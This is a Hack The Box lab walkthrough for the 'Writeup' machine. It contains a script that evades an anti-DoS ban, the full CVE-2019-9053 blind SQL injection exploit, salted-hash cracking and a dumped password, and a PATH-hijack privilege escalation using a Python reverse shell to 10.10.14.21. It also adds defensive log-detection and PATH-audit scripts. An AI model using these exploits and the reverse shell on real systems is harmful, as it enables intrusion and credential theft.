| Machine Name | Level | OS | Logo |
|---|---|---|---|
| Writeup - HTB | Medium | Linux | |
Walkthrough
nmap scan:
┌──(root💀kali)-[~]
└─# nmap -p- -A -T4 10.10.10.138
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-03 18:36 EDT
Stats: 0:01:36 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 96.12% done; ETC: 18:37 (0:00:04 remaining)
Stats: 0:01:50 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 93.14% done; ETC: 18:37 (0:00:00 remaining)
Nmap scan report for 10.10.10.138
Host is up (0.069s latency).
Not shown: 65533 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
| 2048 dd:53:10:70:0b:d0:47:0a:e2:7e:4a:b6:42:98:23:c7 (RSA)
| 256 37:2e:14:68:ae:b9:c2:34:2b:6e:d9:92:bc:bf:bd:28 (ECDSA)
|_ 256 93:ea:a8:40:42:c1:a8:33:85:b3:56:00:62:1c:a0:ab (ED25519)
80/tcp open http Apache httpd 2.4.25 ((Debian))
| http-robots.txt: 1 disallowed entry
|_/writeup/
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Nothing here yet.
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 4.11 (92%), Linux 3.12 (92%), Linux 3.13 (92%), Linux 3.13 or 4.2 (92%), Linux 3.16 - 4.6 (92%), Linux 3.2 - 4.9 (92%), Linux 3.8 - 3.11 (92%), Linux 4.2
(92%), Linux 4.4 (92%), Linux 4.8 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 22/tcp)
HOP RTT ADDRESS
1 68.76 ms 10.10.14.1
2 68.83 ms 10.10.10.138
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 112.78 seconds
When I saw port 80 I was going to start scanning, but I noticed that after certain scanning activity the port was being closed. The service goes down for a certain period and then comes back up. This is very bad, because it means I won't be able to use tools like dirb and gobuster. I then went to the page in the browser. It said that a DDoS product is in use, and when 40* errors are received it treats this as a DDoS and stops the service for a while. First I pulled all the words on the page and built a wordlist.
┌──(root💀kali)-[~/10.10.10.138]
└─# cewl --lowercase --with-numbers -d 3 http://10.10.10.138/ -w wordlist
Then I wrote a Python script. Through this script, when the server was shut down because of the 404s, it would wait for a while and then continue the file and directory discovery. My code is given below.
┌──(root💀kali)-[~/10.10.10.138]
└─# cat exploit/dirbb.py
```python
import time

import requests

path = input("Dosya adı:\r\n")
with open(path) as dosya:
    wordlist = dosya.read().split("\n")

dizi200 = []
url = "http://10.10.10.138/"
sayac = 0

for i in wordlist:
    sayac = sayac + 1
    try:
        r = requests.get(url + i)
        # status_code is an int; comparing it with the string "200" never matched
        if r.status_code == 200:
            dizi200.append(url + i)
        url_ = url + i
        print(url_, r.status_code)
    except requests.exceptions.RequestException:
        # the server drops connections once the 40x-based ban kicks in; wait it out
        print("ddos script'e yakalandı, bekleniyor!")
        time.sleep(60)
    if sayac == 5:
        # throttle: a short pause after every 5 requests, then show what returned 200 so far
        time.sleep(10)
        sayac = 0
        print("---------------")
        for ii in dizi200:
            print(ii)
        print("---------------")
```
┌──(root💀kali)-[~/10.10.10.138]
└─# python3 exploit/dirbb.py
...
...
http://10.10.10.138/apache 404
http://10.10.10.138/40x 404
http://10.10.10.138/errors 404
http://10.10.10.138/bans 404
---------------
---------------
ddos script'e yakalandı, bekleniyor!
ddos script'e yakalandı, bekleniyor!
http://10.10.10.138/hope 404
http://10.10.10.138/get 404
http://10.10.10.138/hit 404
---------------
---------------
http://10.10.10.138/false 404
http://10.10.10.138/positive 404
http://10.10.10.138/drops 404
http://10.10.10.138/where 404
http://10.10.10.138/download 404
---------------
---------------
http://10.10.10.138/the 404
http://10.10.10.138/proper 404
http://10.10.10.138/donkey 404
http://10.10.10.138/please 404
http://10.10.10.138/let 404
---------------
---------------
http://10.10.10.138/via 404
http://10.10.10.138/mail 404
http://10.10.10.138/jkr 404
http://10.10.10.138/writeup 200
At http://10.10.10.138/writeup I got status code 200. When I went to the page and looked through its source code, I saw the phrase CMS Made Simple in the title section. So I searched for whether a published exploit exists for it.
└─# searchsploit CMS Made Simple
------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
CMS Made Simple (CMSMS) Showtime2 - File Upload Remote Code Execution (Metasploit) | php/remote/46627.rb
CMS Made Simple 0.10 - 'index.php' Cross-Site Scripting | php/webapps/26298.txt
CMS Made Simple 0.10 - 'Lang.php' Remote File Inclusion | php/webapps/26217.html
CMS Made Simple 1.0.2 - 'SearchInput' Cross-Site Scripting | php/webapps/29272.txt
CMS Made Simple 1.0.5 - 'Stylesheet.php' SQL Injection | php/webapps/29941.txt
CMS Made Simple 1.11.10 - Multiple Cross-Site Scripting Vulnerabilities | php/webapps/32668.txt
CMS Made Simple 1.11.9 - Multiple Vulnerabilities | php/webapps/43889.txt
CMS Made Simple 1.2 - Remote Code Execution | php/webapps/4442.txt
CMS Made Simple 1.2.2 Module TinyMCE - SQL Injection | php/webapps/4810.txt
CMS Made Simple 1.2.4 Module FileManager - Arbitrary File Upload | php/webapps/5600.php
CMS Made Simple 1.4.1 - Local File Inclusion | php/webapps/7285.txt
CMS Made Simple 1.6.2 - Local File Disclosure | php/webapps/9407.txt
CMS Made Simple 1.6.6 - Local File Inclusion / Cross-Site Scripting | php/webapps/33643.txt
CMS Made Simple 1.6.6 - Multiple Vulnerabilities | php/webapps/11424.txt
CMS Made Simple 1.7 - Cross-Site Request Forgery | php/webapps/12009.html
CMS Made Simple 1.8 - 'default_cms_lang' Local File Inclusion | php/webapps/34299.py
CMS Made Simple 1.x - Cross-Site Scripting / Cross-Site Request Forgery | php/webapps/34068.html
CMS Made Simple 2.1.6 - 'cntnt01detailtemplate' Server-Side Template Injection | php/webapps/48944.py
CMS Made Simple 2.1.6 - Multiple Vulnerabilities | php/webapps/41997.txt
CMS Made Simple 2.1.6 - Remote Code Execution | php/webapps/44192.txt
CMS Made Simple 2.2.14 - Arbitrary File Upload (Authenticated) | php/webapps/48779.py
CMS Made Simple 2.2.14 - Authenticated Arbitrary File Upload | php/webapps/48742.txt
CMS Made Simple 2.2.14 - Persistent Cross-Site Scripting (Authenticated) | php/webapps/48851.txt
CMS Made Simple 2.2.15 - 'title' Cross-Site Scripting (XSS) | php/webapps/49793.txt
CMS Made Simple 2.2.15 - RCE (Authenticated) | php/webapps/49345.txt
CMS Made Simple 2.2.15 - Stored Cross-Site Scripting via SVG File Upload (Authenticated) | php/webapps/49199.txt
CMS Made Simple 2.2.5 - (Authenticated) Remote Code Execution | php/webapps/44976.py
CMS Made Simple 2.2.7 - (Authenticated) Remote Code Execution | php/webapps/45793.py
CMS Made Simple < 1.12.1 / < 2.1.3 - Web Server Cache Poisoning | php/webapps/39760.txt
CMS Made Simple < 2.2.10 - SQL Injection | php/webapps/46635.py
CMS Made Simple Module Antz Toolkit 1.02 - Arbitrary File Upload | php/webapps/34300.py
CMS Made Simple Module Download Manager 1.4.1 - Arbitrary File Upload | php/webapps/34298.py
CMS Made Simple Showtime2 Module 3.6.2 - (Authenticated) Arbitrary File Upload | php/webapps/46546.py
------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results
Papers: No Results
I found the SQL injection exploit, but I had to edit the Python file. It was written for Python 2 and the program crashed while cracking the password. The edited version is given below.
┌──(root💀kali)-[~/10.10.10.138/exploit]
└─# cat 46635.py
```python
#!/usr/bin/env python
# Exploit Title: Unauthenticated SQL Injection on CMS Made Simple <= 2.2.9
# Date: 30-03-2019
# Exploit Author: Daniele Scanu @ Certimeter Group
# Vendor Homepage: https://www.cmsmadesimple.org/
# Software Link: https://www.cmsmadesimple.org/downloads/cmsms/
# Version: <= 2.2.9
# Tested on: Ubuntu 18.04 LTS
# CVE : CVE-2019-9053

import requests
from termcolor import colored
import time
from termcolor import cprint
import optparse
import hashlib

parser = optparse.OptionParser()
parser.add_option('-u', '--url', action="store", dest="url", help="Base target uri (ex. http://10.10.10.100/cms)")
parser.add_option('-w', '--wordlist', action="store", dest="wordlist", help="Wordlist for crack admin password")
parser.add_option('-c', '--crack', action="store_true", dest="cracking", help="Crack password with wordlist", default=False)

options, args = parser.parse_args()
if not options.url:
    print("[+] Specify an url target")
    print("[+] Example usage (no cracking password): exploit.py -u http://target-uri")
    print("[+] Example usage (with cracking password): exploit.py -u http://target-uri --crack -w /path-wordlist")
    print("[+] Setup the variable TIME with an appropriate time, because this sql injection is a time based.")
    exit()

url_vuln = options.url + '/moduleinterface.php?mact=News,m1_,default,0'
session = requests.Session()
dictionary = '1234567890qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM@._-$'
flag = True
password = ""
temp_password = ""
TIME = 1
db_name = ""
output = ""
email = ""
salt = ''
wordlist = ""

if options.wordlist:
    wordlist += options.wordlist

def crack_password():
    global password
    global output
    global wordlist
    global salt
    dict = open(wordlist, encoding='latin-1')
    for line in dict.readlines():
        line = line.replace("\n", "")
        beautify_print_try(line)
        if hashlib.md5(str.encode(str(salt)) + str.encode(line)).hexdigest() == password:
            output += "\n[+] Password cracked: " + line
            break
    dict.close()

def beautify_print_try(value):
    global output
    print("\033c")
    cprint(output,'green', attrs=['bold'])
    cprint('[*] Try: ' + value, 'red', attrs=['bold'])

def beautify_print():
    global output
    print("\033c")
    cprint(output,'green', attrs=['bold'])

def dump_salt():
    global flag
    global salt
    global output
    ord_salt = ""
    ord_salt_temp = ""
    while flag:
        flag = False
        for i in range(0, len(dictionary)):
            temp_salt = salt + dictionary[i]
            ord_salt_temp = ord_salt + hex(ord(dictionary[i]))[2:]
            beautify_print_try(temp_salt)
            payload = "a,b,1,5))+and+(select+sleep(" + str(TIME) + ")+from+cms_siteprefs+where+sitepref_value+like+0x" + ord_salt_temp + "25+and+sitepref_name+like+0x736974656d61736b)+--+"
            url = url_vuln + "&m1_idlist=" + payload
            start_time = time.time()
            r = session.get(url)
            elapsed_time = time.time() - start_time
            if elapsed_time >= TIME:
                flag = True
                break
        if flag:
            salt = temp_salt
            ord_salt = ord_salt_temp
    flag = True
    output += '\n[+] Salt for password found: ' + salt

def dump_password():
    global flag
    global password
    global output
    ord_password = ""
    ord_password_temp = ""
    while flag:
        flag = False
        for i in range(0, len(dictionary)):
            temp_password = password + dictionary[i]
            ord_password_temp = ord_password + hex(ord(dictionary[i]))[2:]
            beautify_print_try(temp_password)
            payload = "a,b,1,5))+and+(select+sleep(" + str(TIME) + ")+from+cms_users"
            payload += "+where+password+like+0x" + ord_password_temp + "25+and+user_id+like+0x31)+--+"
            url = url_vuln + "&m1_idlist=" + payload
            start_time = time.time()
            r = session.get(url)
            elapsed_time = time.time() - start_time
            if elapsed_time >= TIME:
                flag = True
                break
        if flag:
            password = temp_password
            ord_password = ord_password_temp
    flag = True
    output += '\n[+] Password found: ' + password

def dump_username():
    global flag
    global db_name
    global output
    ord_db_name = ""
    ord_db_name_temp = ""
    while flag:
        flag = False
        for i in range(0, len(dictionary)):
            temp_db_name = db_name + dictionary[i]
            ord_db_name_temp = ord_db_name + hex(ord(dictionary[i]))[2:]
            beautify_print_try(temp_db_name)
            payload = "a,b,1,5))+and+(select+sleep(" + str(TIME) + ")+from+cms_users+where+username+like+0x" + ord_db_name_temp + "25+and+user_id+like+0x31)+--+"
            url = url_vuln + "&m1_idlist=" + payload
            start_time = time.time()
            r = session.get(url)
            elapsed_time = time.time() - start_time
            if elapsed_time >= TIME:
                flag = True
                break
        if flag:
            db_name = temp_db_name
            ord_db_name = ord_db_name_temp
    output += '\n[+] Username found: ' + db_name
    flag = True

def dump_email():
    global flag
    global email
    global output
    ord_email = ""
    ord_email_temp = ""
    while flag:
        flag = False
        for i in range(0, len(dictionary)):
            temp_email = email + dictionary[i]
            ord_email_temp = ord_email + hex(ord(dictionary[i]))[2:]
            beautify_print_try(temp_email)
            payload = "a,b,1,5))+and+(select+sleep(" + str(TIME) + ")+from+cms_users+where+email+like+0x" + ord_email_temp + "25+and+user_id+like+0x31)+--+"
            url = url_vuln + "&m1_idlist=" + payload
            start_time = time.time()
            r = session.get(url)
            elapsed_time = time.time() - start_time
            if elapsed_time >= TIME:
                flag = True
                break
        if flag:
            email = temp_email
            ord_email = ord_email_temp
    output += '\n[+] Email found: ' + email
    flag = True

dump_salt()
dump_username()
dump_email()
dump_password()
if options.cracking:
    print(colored("[*] Now try to crack password"))
    crack_password()
beautify_print()
```
When I ran the code I got the following output.
#[+] Salt for password found: 5a599ef579066807
#[+] Username found: jkr
#[+] Email found: [email protected]
#[+] Password found: 62def4866937f08cc13bab43bb14e6f7
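A defender's view of the same injection: every timing probe above gets a normal 200 and a normal-looking body, so a ban that only counts 40x responses (like the one on this box) never sees it. This is an added example, not part of the original writeup, that scans constructed Apache combined-format access log lines for a delay primitive in any query parameter and counts probes per client and endpoint.

```python
import re
from collections import Counter
from urllib.parse import parse_qs, urlsplit

# Apache "combined" format: client, identd, user, [time], "request", status, size, "referer", "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)
# Delay primitives a time-based blind injection relies on; the CMSMS payload uses sleep()
DELAY_RE = re.compile(r'\b(sleep|benchmark|pg_sleep)\s*\(|\bwaitfor\s+delay\b', re.I)

def is_time_based_probe(target):
    """True if any query-string value of the request target carries a delay primitive.
    parse_qs undoes the '+' and %xx encoding, so the check sees the SQL as the server does."""
    params = parse_qs(urlsplit(target).query, keep_blank_values=True)
    return any(DELAY_RE.search(v) for values in params.values() for v in values)

def scan_access_log(lines):
    """Return the flagged (ip, path, status) records and a per-(ip, path) probe counter.
    The status is 200 on every probe: a 40x-only ban never fires on this traffic."""
    flagged, per_client = [], Counter()
    for line in lines:
        m = LOG_RE.match(line)
        if m and is_time_based_probe(m["target"]):
            path = urlsplit(m["target"]).path
            flagged.append((m["ip"], path, int(m["status"])))
            per_client[(m["ip"], path)] += 1
    return flagged, per_client

# Constructed sample: two salt/username probes in the exploit's format, two benign requests
SAMPLE_LOG = """\
10.10.14.21 - - [03/Oct/2021:18:50:01 -0400] "GET /writeup/moduleinterface.php?mact=News,m1_,default,0&m1_idlist=a,b,1,5))+and+(select+sleep(1)+from+cms_siteprefs+where+sitepref_value+like+0x3525+and+sitepref_name+like+0x736974656d61736b)+--+ HTTP/1.1" 200 3112 "-" "python-requests/2.25.1"
10.10.14.21 - - [03/Oct/2021:18:50:02 -0400] "GET /writeup/moduleinterface.php?mact=News,m1_,default,0&m1_idlist=a,b,1,5))+and+(select+sleep(1)+from+cms_users+where+username+like+0x6a25+and+user_id+like+0x31)+--+ HTTP/1.1" 200 3112 "-" "python-requests/2.25.1"
10.10.14.5 - - [03/Oct/2021:18:51:10 -0400] "GET /writeup/index.php?page=about HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.10.14.5 - - [03/Oct/2021:18:51:12 -0400] "GET /writeup/moduleinterface.php?mact=News,m1_,default,0&m1_idlist=1,2,3 HTTP/1.1" 200 3112 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    hits, counts = scan_access_log(SAMPLE_LOG.splitlines())
    for rec in hits:
        print("probe:", rec)
    for (ip, path), n in counts.items():
        print(f"{ip} sent {n} timing probes to {path}")
```

A real extraction of a 16-character salt plus username, email and a 32-character hash needs thousands of such requests to one endpoint, so the per-client count is the signal worth alerting on.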
Then I saved the hash-cracking part of the code as a separate Python script and did the cracking myself. The Python code is given below.
```python
import hashlib

def crack_password():
    password = "62def4866937f08cc13bab43bb14e6f7"
    wordlist = "/usr/share/wordlists/rockyou.txt"
    salt = "5a599ef579066807"
    # same scheme as the exploit's crack routine: md5(salt + candidate) compared with the dumped hash
    with open(wordlist, encoding="latin-1") as dict_file:
        for line in dict_file:
            line = line.replace("\n", "")
            if hashlib.md5(str.encode(str(salt)) + str.encode(line)).hexdigest() == password:
                print("\n[+] Password cracked: " + line)
                break

crack_password()
```
┌──(root💀kali)-[~/10.10.10.138/exploit]
└─# python3 crack.py
[+] Password cracked: raykayjay9
When I connected over SSH I read the user flag.
┌──(root💀kali)-[~]
└─# ssh jkr@10.10.10.138
jkr@10.10.10.138's password:
Linux writeup 4.9.0-8-amd64 x86_64 GNU/Linux
The programs included with the Devuan GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Devuan GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
jkr@writeup:~$ pwd
/home/jkr
jkr@writeup:~$ ls
user.txt
jkr@writeup:~$ cat user.txt
846446f10caff03660d3ef24705e13ec
jkr@writeup:~$
Inside, I ran a number of checks; in my view we should have been able to become root using the Python libraries, but it did not work. I really don't understand why. Anyway...
I uploaded the pspy tool to the machine and started watching the processes.
jkr@writeup:/tmp$ wget http://10.10.14.21/pspy32s
--2021-10-04 18:38:52-- http://10.10.14.21/pspy32s
Connecting to 10.10.14.21:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1090528 (1.0M) [application/octet-stream]
Saving to: ‘pspy32s’
pspy32s 100%[==============================>] 1.04M 559KB/s in 1.9s
2021-10-04 18:38:54 (559 KB/s) - ‘pspy32s’ saved [1090528/1090528]
jkr@writeup:/tmp$ chmod 777 pspy32s
The processes that appeared when I made an SSH connection are given below.
2021/10/04 18:40:01 CMD: UID=0 PID=2059 | /usr/sbin/CRON
2021/10/04 18:40:01 CMD: UID=0 PID=2060 | /bin/sh -c /root/bin/cleanup.pl >/dev/null 2>&1
2021/10/04 18:40:05 CMD: UID=0 PID=2061 | sshd: [accepted]
2021/10/04 18:40:05 CMD: UID=0 PID=2062 | sshd: [accepted]
2021/10/04 18:40:09 CMD: UID=0 PID=2063 | sshd: jkr [priv]
2021/10/04 18:40:09 CMD: UID=0 PID=2064 | sh -c /usr/bin/env -i PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin run-parts --lsbsysinit /etc/update-motd.d > /run/motd.dynamic.new
2021/10/04 18:40:09 CMD: UID=0 PID=2065 | run-parts --lsbsysinit /etc/update-motd.d
2021/10/04 18:40:09 CMD: UID=0 PID=2066 | /bin/sh /etc/update-motd.d/10-uname
2021/10/04 18:40:09 CMD: UID=0 PID=2067 | sshd: jkr [priv]
As can be seen, the program named run-parts was executed without a path being specified.
Looking at PATH:
jkr@writeup:/tmp$ echo $PATH
/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
And looking at the paths we can write to:
╔══════════╣ Interesting GROUP writable files (not in Home) (max 500)
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-files
Group jkr:
/tmp/linpeas.sh
Group cdrom:
Group floppy:
Group audio:
Group dip:
Group video:
Group plugdev:
Group staff:
/var/local
/usr/local
/usr/local/bin
/usr/local/include
/usr/local/share
/usr/local/share/sgml
/usr/local/share/sgml/misc
/usr/local/share/sgml/stylesheet
/usr/local/share/sgml/entities
/usr/local/share/sgml/dtd
/usr/local/share/sgml/declaration
/usr/local/share/fonts
/usr/local/share/ca-certificates
/usr/local/share/man
/usr/local/share/emacs
/usr/local/share/emacs/site-lisp
/usr/local/share/xml
/usr/local/share/xml/schema
/usr/local/share/xml/misc
/usr/local/share/xml/entities
/usr/local/share/xml/declaration
/usr/local/games
/usr/local/lib/python3.5
/usr/local/lib/python3.5/dist-packages
/usr/local/lib/python2.7
/usr/local/lib/python2.7/dist-packages
/usr/local/lib/python2.7/site-packages
/usr/local/sbin
We can see that we can manipulate the PATH. Let's create a reverse shell and become root.
jkr@writeup:/tmp$ echo $PATH
/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
jkr@writeup:/tmp$ cd /usr/local/bin
jkr@writeup:/usr/local/bin$ touch run-parts
jkr@writeup:/usr/local/bin$ nano run-parts
jkr@writeup:/usr/local/bin$ cat run-parts
python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.21",1234));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'
jkr@writeup:/usr/local/bin$ chmod 777 run-parts
When I tried to connect to the machine over SSH again:
┌──(root💀kali)-[~]
└─# ssh jkr@10.10.10.138
jkr@10.10.10.138's password:
A reverse shell comes in on my port 1234.
┌──(root💀kali)-[/opt]
└─# nc -lvp 1234
listening on [any] 1234 ...
connect to [10.10.14.21] from writeup.htb [10.10.10.138] 52400
# id
id
uid=0(root) gid=0(root) groups=0(root)
# cd /root
cd /root
# ls
ls
bin root.txt
# cat root.txt
cat root.txt
5fd505e0c8af615cf7f6c36d60ee5276
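The escalation works because the root-owned login hook sets PATH with `env -i` and then calls `run-parts` by bare name, and two of the directories searched before the one that really holds it (`/usr/local/sbin` and `/usr/local/bin`) are writable by group staff. As an added example (not from the original writeup), the following check extracts that PATH from the pspy line and reports the group- or world-writable directories that would shadow the real binary; `demo()` builds a throwaway directory layout so it runs offline.

```python
import os
import re
import stat
import tempfile

# The root-owned command pspy showed during SSH login (copied from the writeup's output)
PSPY_CMD = ("sh -c /usr/bin/env -i PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin "
            "run-parts --lsbsysinit /etc/update-motd.d > /run/motd.dynamic.new")

def path_from_command(cmdline):
    """Return the value of PATH=... in an 'env ... cmd' command line, or None if absent."""
    m = re.search(r'\bPATH=(\S+)', cmdline)
    return m.group(1) if m else None

def loosely_writable(directory):
    """True if directory is writable by its group or by everyone (permission bits only;
    whether the current user is in that group, like jkr in staff here, is the follow-up question)."""
    try:
        mode = os.stat(directory).st_mode
    except FileNotFoundError:
        return False
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))

def shadowing_candidates(path_value, binary):
    """Directories searched before the one that really holds `binary` and that are
    group/world-writable: a same-named file dropped there is what the caller executes."""
    entries = path_value.split(":")
    real_dir = next((d for d in entries if os.path.isfile(os.path.join(d, binary))), None)
    if real_dir is None:
        return []  # binary resolves nowhere on this PATH: nothing to shadow
    risky = []
    for d in entries:
        if d == real_dir:
            break  # entries after the real location are never consulted
        if loosely_writable(d):
            risky.append(d)
    return risky

def demo():
    """Constructed layout: a group-writable dir listed ahead of the dir holding run-parts."""
    root = tempfile.mkdtemp()
    strict, loose, real = (os.path.join(root, n) for n in ("sbin", "local_bin", "bin"))
    for d, mode in ((strict, 0o755), (loose, 0o775), (real, 0o755)):
        os.mkdir(d)
        os.chmod(d, mode)
    open(os.path.join(real, "run-parts"), "w").close()
    return shadowing_candidates(":".join((strict, loose, real)), "run-parts"), loose

if __name__ == "__main__":
    print("PATH used by root:", path_from_command(PSPY_CMD))
    risky, _ = demo()
    print("writable dirs ahead of the real run-parts:", risky)
```

Run against the live PATH from the pspy line, `shadowing_candidates(path_from_command(PSPY_CMD), "run-parts")` is the check an admin would want to come back empty; the fixes are an absolute path in the hook or tightening the mode of the `/usr/local/*` directories.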